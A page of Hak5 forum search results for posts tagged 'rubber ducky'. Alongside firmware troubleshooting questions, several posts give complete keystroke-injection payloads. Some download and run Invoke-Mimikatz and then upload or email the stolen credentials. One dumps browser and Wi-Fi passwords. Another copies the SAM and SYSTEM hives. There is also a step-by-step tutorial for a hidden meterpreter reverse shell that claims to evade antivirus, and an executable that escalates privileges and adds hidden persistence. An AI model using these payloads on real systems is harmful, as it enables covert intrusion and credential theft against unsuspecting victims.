Hak5 Forums


Showing results for tags 'rubber ducky'.



Found 51 results

  1. Ducky NirCMD bin file creation

    Hey All, I am trying to create a bin file with some nircmd commands and I keep getting errors on it. Can anyone advise me on how I am being an idiot. Thanks NW
  2. Bluetooth Rubber Ducky

    Hi guys, I've been playing around trying to create a Bluetooth version of Rubber Ducky working. Not sure how useful that would be, but I'm in the very early stages. Have been experimenting with this beauty: BBC micro:bit Most 11/12 year olds in the UK will have received one of these in school last year. The BBC ran a programme that allowed schools to apply for free micro:bits for all of Year 7 (6th grade). There's a friendly online interface to program them in Python, but you can actually compile C++ for these badboys. They're available for under £15 / $18: http://microbit.org/resellers/, hence making good little gadgets to mess around with for a BT Rubber Ducky. The micro:bit has a few pins available, a USB port, a small bluetooth antenna, it's very small and can be battery powered (or USB powered). On the front there are 15 LED lights and two buttons to play with: You can program the micro:bit to connect via Bluetooth, with little security (no PIN or anything). Then you can use the two buttons to send commands to the computer or smartphone. At the moment, I'm only able to send ASCII commands, so I've been mapping out the special commands in an ASCII/latin table. I haven't yet figured out how to use the Windows key, but I have managed to take a screenshot ("\x8C") and save a file with the name pwned ("\x99,s,pwned,\n"). Sample file available here, just drag and drop it onto your micro:bit, connect to 'ducky' via BT, the left button will take screenshots, the right button will save files. Code is available here, hopefully others will be able to assist with this experiment :).
  3. Hi, Hak5Forums! I'm new here and would like to post some code I wrote for the USB Rubber Ducky that allows you guys to make a RAT (Remote-Administration Tool) with the Ducky. Here is the GitHub Link: https://github.com/untitledusername/duckyRAT GitHub Wiki/Tutorial Link: https://github.com/untitledusername/duckyRAT/wiki Please note, this script doesn't allow webcam access or things of that such (I'm sure you can probably get that somehow using the command line) This script only allows you to run CMD commands on the victim's PC. If you have any questions I'll gladly answer them down below. Edit: I'm working on adding features to take screenshots of victim's desktop, webcam, etc. Thanks everybody, enjoy! - untitled ❤
  4. A question about scripting

    I am trying to add a twist on the 15 second password stealer i robot hack in which it emails the credentials instead of uploading them to a server. This is my code. I changed the email addresses and passwords for security. DELAY 3000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1');$output = Invoke-Mimikatz -DumpCreds; $output > log.txt;" ENTER DELAY 1500 STRING powershell ENTER STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('MyEmail1@gmail.com', 'MyPassword') ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'MyEmail1@gmail.com' ENTER STRING $ReportEmail.To.Add('MyEmail2@gmail.com') ENTER STRING $ReportEmail.Subject = 'PassDump' ENTER STRING $ReportEmail.Body = (Get-Content Log.txt | out-string) ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 2000 STRING exit ENTER DELAY 500 REM Clear the Run history and exit ENTER STRING exit ENTER and in my email in-box all i got was a email that said the words " How do I get it so it actually sends the output of Invoke-Mmikats instead of literally sending the words Invoke-Mimikatz. Thanks in advance.
  5. This is a modified version of MrGray's script to get passwords from a pc (Original). This version doesn't require an extra usb, but it does require a online server hosting a zip with the tools. CODE ------------------------------------------------------- REM Created by BertFast REM Gets passwords and data from pc and emails them DELAY 500 GUI d DELAY 200 GUI r DELAY 300 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 3000 LEFT ENTER DELAY 500 STRING powershell & cd %TEMP%\tools & BrowsingHistoryView.exe /stext logs\BrowsingHistoryView.txt & ChromePass.exe /stext logs\ChromePass.txt & OperaPassView.exe /stext logs\OperaPassView.txt STRING & PasswordFox.exe /stext logs\PasswordFox.txt & SkypeLogView.exe /stext logs\SkypeLogView.txt & WebBrowserPassView.exe /stext logs\WebBrowserPassView.txt & WirelessKeyView.exe /stext logs\WirelessKeyView.txt & powershell -ExecutionPolicy Bypass %TEMP%\tools\file.ps1 STRING & cd %TEMP% & del tools.zip & exit ENTER STRING Add-Type -AssemblyName System.IO.Compression.FileSystem ENTER STRING function Unzip ENTER STRING { ENTER STRING param([string]$zipfile, [string]$outpath) ENTER STRING [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) ENTER STRING } ENTER STRING wget "http://pathtotools.zip/Tools.zip" -OutFile $ENV:temp\tools.zip ENTER STRING Unzip $ENV:temp\tools.zip $ENV:temp ENTER STRING cd $ENV:temp\tools ENTER STRING mkdir logs ENTER STRING exit ENTER Link to the tools: https://www.mediafire.com/file/ddcur1ebc3fbvb5/Tools.zip HOW TO SET IT UP ------------------------------------------------------- Download the Tools.zip file and extract it. Then, open file.ps1 with notepad or whatever program you like and changer "YourUsername" to you username (i.e bertfast) and "YourPassword" to your password. Then change "receiver" to whoever you want to send the logs to. I MADE IT WORK WITH GMAIL. I don't know if it works with other services. 
After that, zip the Tools folder (don't zip the files or it won't work). In the code above, change "http://pathtotools.zip/Tools.zip" to the path where you have hosted the zip file. Tested in Windows 10 x64. BIG thanks to MrGray for the original script. Also, big thanks to Nurrl. With Duckuino I converted the code above to make it work with my Arduino (I don't own a rubber ducky, sorry). Please tell me if it worked or not and the OS you are using.
  6. I bought the USB Rubber Ducky, and it appears that I cannot get it to go into DFU mode. After taking the Micro SD card out, I hold the black button and stick it into my PC, but all I see is a solid red LED on the Ducky. I'm trying to get it to go into DFU mode so I can get Twin Ducks but the DFU mode isn't working. Any help would be greatly appreciated.
  7. No firmware works

    I'm using Windows 10 with Microsoft Visual C++ 2010 Redistributable, Flip (JRE_Flip_Installer_3.4.2.exe) and Atmel Driver (atmel-flip-3.4.2-signed-driver.zip). My "program.bat":

        @echo off
        rem setup console
        title RubberDucky Programming
        @echo ____________________________________________
        @echo [#] RubberDucky Programming Script
        @echo [-] Programming File: [%1]
        if "%1"=="" ( goto :bail )
        if not exist %1 ( goto :bail )
        batchisp -device at32uc3b0256 -hardware usb -operation erase f memory flash blankcheck loadbuffer %1 program verify start reset 0
        goto :done
        :bail
        @echo [!] Please provide valid input (.hex) file!
        :done
        goto :eof

    When I use "program.bat" with any firmware, I have the following message:

        Device selection....................... PASS
        Hardware selection..................... PASS
        Opening port........................... PASS
        Reading Bootloader version............. PASS 1.0.2
        Erasing................................ PASS
        Selecting FLASH........................ PASS
        Blank checking......................... PASS 0x00000 0x3ffff
        Parsing HEX file....................... PASS ????????.hex
        WARNING: The user program and the bootloader overlap!
        Programming memory..................... PASS 0x00000 0x07caf
        Verifying memory....................... PASS 0x00000 0x07caf
        Starting Application................... PASS RESET 0

    I tried to use with the following firmwares: c_duck_v2.hex c_duck_v2.1.hex c_duck_v2_S001.hex c_duck_v2_S002.hex Composite_Duck_S003.hex duck.hex duck_v2.hex duck_v2.1.hex m_duck.hex m_duck_v2.hex usb.hex USB_v2.hex USB_v2.1.hex Only with the firmwares "c_duck_v2_S002.hex" and "Composite_Duck_S003.hex" does the light blink green. With the other firmwares, the light blinks red. With "usb???.hex", the light doesn't turn on. Even with the firmwares "c_duck_v2_S002.hex" and "Composite_Duck_S003.hex", the script does not run on either Windows 7 or Windows 10. My script (inject.bin):

        REM Prints: Hello World!
        DELAY 10000
        STRING Test
        DELAY 5000
        STRING Hello World

    I tried with the original MicroSD card (128MB format with FAT and FAT32) and with another MicroSD card (64MB format with FAT). Please, I need some help. Thank you.
  8. @ sign instead of "

    This is what the rubber ducky is outputting to my CMD window: Notice that @ signs have been subbed for " marks. I've tried changing the language from GB to US, but that doesn't seem to help either powershell @IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)@ Here's the contents of the file that I pass to ducktools (python.exe ducktools.py -e -l us mimi.txt inject1.bin) to get my inject.bin file Any help would be greatly appreciated! Mimi.txt file contents: REM Title: Invoke mimikatz and send creds to remote server REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt REM STRING mode con:cols=18 lines=1 ENTER REM STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue ENTER STRING exit ENTER
  9. Modify firmware source code

    I want to modify the source code of one of the firmwares of the Rubber Ducky project, for example to write a number to a .text file inside the memory each time I plug the memory into a PC ... but I am a little lost with the code. Does somebody have experience with this? Has somebody been working on this issue? Thanks, and sorry for my English, I am Latin American.
  10. I am planning on buying the USB Rubber Ducky and I was wondering if this is possible. I was wondering if I or someone could make a payload or whatever it's called to remotely control a computer outside the network. Perhaps like VNC. Also if you could teach me how to make it WON from a different network. I would really appreciate if someone says its all possible to do with a rubber ducky alone, and also help me. THANKS!
  11. Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we? Step 1: Fire up Kali Linux and open a terminal. And using msfvenom we are going to create a shellcode. Enter this code: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt The first part "msfvenom" indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine, open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080, 4444. They all work. The -f parameter writes the shellcode in powershell format (obviously since we're using powershell). And the last part after the ">" indicates the location where this payload will be saved in. STEP 2: Now we are going to upload the shellcode to github or pastebin (whichever you prefer). Create a github account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that! STEP 3: Now the fun part! Time to code the ducky. 
Copy and Paste my code and change the corresponding lines. DELAY 500 GUI x DELAY 1000 a DELAY 1000 ALT y DELAY 1000 STRING powershell -WindowStyle hidden ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1') ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp') ENTER DELAY 1000 STRING Invoke-Shellcode -Shellcode ($buf) -Force ENTER What is going here in we are calling the windows + x button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up powershell, BUT IT OPENS IT UP HIDDEN. So the actual powershell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After powershell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, the second IEX string, you want replace the last link with whatever the link is to your script is on your github account. Remember the one you uploaded? You want to click on github, the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code. To set up the listener, open up a terminal in Kali. >msfconsole >use exploit/multi/handler >set payload windows/x64/meterpreter/reverse_https >set LHOST XXX (whatever IP you used, which would be your kali machine IP) >set LPORT XXX (whatever port you used) >exploit And there you go! Of course, have your listener before doing the attack. If you have any questions, please comment! 
This is my first actual tutorial, so feedback is wanted.
  12. !! EDIT !! !! Now updated so it should be very fast and effective !! !! This is a remake of my bashbunny script so it works on the rubberducky too https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber !! Hello everyone! I made this nice script that gives you a lot of information about your victim's computer and stores it on the rubberducky if it runs twin duck firmware, for example their IP and public IP. Change it as much as you want, but please make me as source since I spent around 15 hours on this. It executes in around 6 seconds :) It also finds more information than it did before :) Just drag the files I upload into your rubberducky running twin duck firmware. You can also see the inject.txt in there so you can convert it to the language you want :) The rubberducky also has to have the name DUCKY for this script to work, because the command it runs is searching for a usb with the name DUCKY. Remember this only works if you use the twin duck firmware on your rubberducky. :) The information you grab from your victim will be saved inside a folder called Loot. You can either download the files from my github https://github.com/MrSnowMonster/MrSnows-SnowGlobe/tree/master/Tech/Hacking and Pentesting/RubberDucky/Infograbber rubberducky version or download the rar file I uploaded here. :) info.zip
  13. Whenever I run a payload that has a string with the '@' symbol, it writes ' " ' instead.... Any way around this???
  14. SAM File Copy - Help

    Hey everyone. I have a question. I am looking at the SAM File Grabber on a live system script and I cant seem to get it to work. I plug it in and the screen just goes crazy and then it doesnt copy anything over. Here is the script I am using. REM Modifications by overwraith ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 REM THE NEXT LINE IS WHERE CHANGING THE DIRECTORY REM TO DESIRED DIRECTORY WOULD HAVE GONE. REM CHANGE DIRECTORY 'DUCKY' FLASH DRIVE. STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:) ENTER DELAY 800 STRING cd %DUCKYdrive% DELAY 400 STRING copy con download.vbs ENTER STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/"))) ENTER STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send() ENTER STRING If objXMLHTTP.Status = 200 Then ENTER STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open ENTER STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0 ENTER STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a ENTER STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing ENTER STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing ENTER CTRL z ENTER STRING cscript download.vbs http://xxxxxxxxxxxxxxx/xxx/vssown.vbs ENTER DELAY 800 STRING del download.vbs ENTER DELAY 800 STRING cscript vssown.vbs /start ENTER DELAY 800 STRING cscript vssown.vbs /create ENTER DELAY 800 STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . ENTER DELAY 800 STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . ENTER DELAY 800 STRING cscript vssown.vbs /stop ENTER DELAY 800 STRING del vssown.vbs ENTER STRING exit ENTER REM Make sure to change the DIRECTORY above. 
I changed STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . to STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . Also the following: STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . to STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . Ducky is the name of the MicroSD Card so would that be correct? I changed STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs to a vbs script provided by LanMaster53 github account. https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs and changed the URL to my site hosting it. What am I missing. It doesnt seem to work or dump any files back on the Rubber Duck. I am running the Twin Duck Firmware.
  15. Buying Duck

    Hi hak5, I'm new here and I wanted to buy the rubber ducky but the problem is that it's not shipped in my country ( Pakistan ) so how can I get one, please help.
  16. I downloaded files from GitHub, and installed "atmel flip", but I don't know how to use this. I also saw a video; this showed me something about flashing on Windows, but I can't understand that. Why did he use cmd to flash the firmware? If I need not install any applications, do I just use cmd? Thank you for helping me. My English is bad.
  17. Usb Rubber ducky only opens cmd

    When I plug my USB rubber ducky into the USB slot and push the black button, the ducky opens a command prompt and types: or /f % in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d %myd%/duck The USB even types that if I don't have any SD card in the slot. I am running firmware c_duck_us.hex because that is the only one that actually acts like a keyboard. If anyone has the factory hex I would appreciate it if you send it to me. Thanks
  18. Hello, first of all sorry if this is the wrong place to post this... I'm a super newbie but I have an exfiltration attack I need to carry out and was hoping you could help out. I don't particularly feel comfortable in betting on a period of time alone with the target computer so I'd rather socially engineer it. I plan to do this by offering to transfer peace offering files off of my USB (likely to be either a rubber ducky or a bash bunny) whilst the payload does its thing. The main problem I'm having is in the size of the files I plan to exfiltrate: they are upwards of 10mb and there may be hundreds. In order to cover the time it would take to exfiltrate these files, my "peace offering" also needs to be sizeable. My question is do you think this is possible and also what tool do you think can best carry out this task? Any help welcome!! P.S. My research has led me to believe that exfiltration isn't possible through wifi pineapple, if this is incorrect please let me know :)
  19. Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later). What the executable does: - Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user. - Depending on privilege level, either continue execution or attempt to elevate. (- If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y') - Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden. - Creates a hidden Task Scheduler task which runs the executable on each user logon. - Executes encoded Powershell payload. Why smart privilege checking is important: If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear: This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell. Now if a user is part of the admin group then we see a dialog like this: This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreters 'getsystem' command and we're away! 
Tutorial: What you'll need: - Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft). - Linux based PC/VM for generating our payload/listening for connections. Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload. - USB Rubber ducky (with Twin Duck or similar firmware installed) - This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before) Let's start: - On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'. - You will be presented with various options, hit '1' and then enter. - Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter. - More options, hit '1' and then enter. - Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding) - Give it a port and then say 'yes' when it asks if you want to start the listener. - Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/' - You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt' You should be faced with this screen: - Select all the text and copy it. - Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file: - Go to the line with the pre-inserted Powershell payload (Line 64): - Replace the text within the double quotes with your payload you got from the web server earlier. - Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them. 
- Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need. - Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive. - Now we need our ducky payload, here is the code: REM Awesome script DELAY 500 GUI R DELAY 50 STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe" DELAY 50 ENTER DELAY 1500 ALT Y DELAY 1000 STRING exit DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER - Generate your inject.bin file with an encoder. - Copy the inject.bin to your Ducky's drive and there we have it! Some caveats: - The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script. - Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works! So tell me what you think, feedback is greatly appreciated!
  20. I've optimized the Mr. Robot hack to run faster (regardless of web server response times, latency, etc.) and more covertly. Feel free to use the techniques with other payloads. Once the FE (white/yellow) command prompt closes you can remove the rubber ducky and the script will continue to exfiltrate creds in the background. DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('https://example.com/rx.php',$o)"&exit ENTER
  21. Do I just need to move the .bin file to the cd card? How could I write code so that I can let something save to my rubber ducky? Thank you so much.
  22. So I have been working on a script (admittedly for a while, this is my first script) to grab wifi names and passwords off computers and dump them to a text file. So far I have it working great, it grabs every wireless Internet connection that the computer has ever made and it dumps it straight back to usb within seconds, to grab and go. I just need help with one thing... How to hide the powershell window, and is there any way of making this script better (I already know I can use powershell to send txt files to servers or through email, I just think it's easier with such a simple script to dump it straight back to usb)? Here is the Script
  23. Type text from picture

    So is there a way to make rubber ducky convert picture to text from certain part of the screen and then to type it? I don't mind using external programs. By typing text from image I mean just a photo of a document containing only text.
  24. Is this a Vulnerability for ducky?

    So, I'm not sure what to make of this. Maybe it's nothing. My friend was setting up a bunch of dells and noticed this http://www.dell.com/support/home/us/en/04/Drivers/DriversDetails?driverId=5DD13 it looks like just another driver, but HID and BIOS got me wondering. I found this link http://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_150812_1 that gives a better description. I couldn't find anything online about what BIOS HID commands there could be. Why would the BIOS need access to HID? If it does have access, what keys does it have, and how do computers interpret them? Could this be exploited? I honestly can't find anything else, but I thought I'd post this in case anyone knows what it actually does and can debunk my curiosity.
  25. Just received the brand new bunny, however, from what I can see it does not come with any other keyboard support than US (us.json). Any ATM for full keyboard support like the rubber ducky has? Any simple way of porting the language files from rubber ducky to this? I did take a look at the HID map to try to map my own xxx.json, I failed when it came to multiple key combinations resulting in one output key. Any specific method to make this process A LOT easier?